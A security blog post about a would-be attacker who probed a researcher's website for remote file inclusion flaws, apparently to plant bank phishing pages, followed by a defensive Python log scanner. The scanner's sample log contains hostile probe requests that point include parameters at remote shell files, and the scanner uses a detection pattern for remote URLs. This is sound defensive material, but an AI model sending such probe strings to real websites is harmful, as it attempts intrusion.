RFI Vulnerability Lesson: Beware of Who You (try to) Hack

Isn’t it rewarding when a fellow security professional posts about an attempted hack of his personal website that he turned into a lesson in website security? And in the end, hacked the hacker? That’s exactly what happened with Larry Cashdollar, a senior security response engineer at Akamai. Cashdollar noticed something peculiar in the logs on his personal website. He dug further and turned up signs of someone scanning for remote file inclusion (RFI) vulnerabilities.

Before diving into the details, if you’re not sure what an RFI vulnerability is, definitely ask your web development and website management team whether they’re aware of this type of vulnerability. If they don’t know, they need to do some research to prevent hacking attacks on your websites. You can satisfy your curiosity – and share with your web team – with this link to more information about it.

On to the Hacking Attempt

Larry Cashdollar told The Register his site’s logs showed that a would-be attacker was probing for RFI holes, trying to trick the web application into fetching and running a malicious script hosted on a remote server. The hacker was trying to load a file using a custom tool that Cashdollar had created (!).

The hacker’s test was a generic one used against many websites: find an input parameter, supply a web address as its value, and see whether the site loads and executes whatever that address points to. Unfortunately for the attacker, Cashdollar used the tool’s logs to trace back to the file the attacker was trying to load. Cashdollar then assessed that file and the other files the hacker had ready to execute to take over vulnerable websites, and was able to extract the criminal’s email address and preferred language – Portuguese.

What was the purpose of the RFI vulnerability probe? The attacker wanted to install phishing pages that masqueraded as a legitimate bank’s login webpage, and then direct victims to the hacker’s page to collect bank account credentials. This was a way around installing more sophisticated code to capture cryptocurrency. It was just a matter of redirecting someone to a malicious site, because the initial fake webpage looked legitimate.

3 Big Takeaways from the RFI Vulnerability Probe

Score one for the good guys! In this case the security professional caught and tracked down the attacker. Now we need to take it as an alert to the professionals who are responsible for monitoring website security. From Cashdollar’s account of the incident, the big takeaways for website administrators are the importance of:

  1. Diligently monitoring the audit logs
  2. Following a solid patching program for site management tools
  3. Writing web code that cannot be exploited for RFI and other known vulnerabilities.
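As an added illustration of the first takeaway (this is example code, not anything from Cashdollar’s tool or the original post), the script below scans web server access log lines for the kind of RFI probe described above: a query parameter whose value is a full remote URL. The log lines are constructed samples, and `own_hosts` is an assumed allowlist of hostnames the site legitimately accepts in parameters, so that its own redirect links are not flagged.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2019:13:55:36 +0000] "GET /index.php?page=http://203.0.113.99/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2019:13:56:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2019:13:56:40 +0000] "GET /wp-content/plugins/x/inc.php?file=https%3A%2F%2Fexample.net%2Fc.php HTTP/1.1" 404 0 "-" "curl/7.64"
192.0.2.8 - - [10/Oct/2019:13:57:02 +0000] "GET /redirect?url=https://www.example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status from a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Schemes PHP-style include() calls will happily fetch when a parameter is a URL.
REMOTE_RE = re.compile(r'^(https?|ftp|php)://', re.IGNORECASE)


def find_rfi_probes(log_text, own_hosts=()):
    """Return one record per request whose query parameter value is a remote URL.

    own_hosts (assumed allowlist): hostnames the site legitimately accepts in
    parameters, e.g. its own domain, so those requests are not reported.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not combined-format entries
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = unquote(value)        # parse_qsl decoded once; this catches double-encoding
            if not REMOTE_RE.match(value):
                continue
            host = urlsplit(value).netloc.split("@")[-1].split(":")[0].lower()
            if host in own_hosts:
                continue
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path,
                         "param": name, "url": value, "status": int(m.group("status"))})
    return hits


def probes_by_ip(hits):
    """Count flagged requests per source IP so repeat scanners stand out."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for hit in find_rfi_probes(SAMPLE_LOG, own_hosts=("www.example.com",)):
        print(hit)
```

A 200 response to a flagged request does not by itself prove the include succeeded, but it is the line worth investigating first; a scan of only 404s still tells you which parameters and paths the attacker expects to find.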

If your website developers and administrators don’t know and don’t watch, you may not be as lucky as Cashdollar.

Chris Apgar, CISSP, CEO and president of Apgar & Associates, LLC, is a nationally recognized expert and educational instructor on information security, privacy, HIPAA, the HITECH Act, state privacy law and electronic health information exchange. A nationally known speaker and author, Chris authored the McGraw-Hill Healthcare Information Technology Exam Guide chapter on the regulatory aspects of health IT.